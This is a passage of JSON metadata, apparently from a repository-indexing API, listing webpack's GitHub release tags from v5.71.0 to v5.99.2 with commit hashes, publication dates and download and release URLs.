/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"}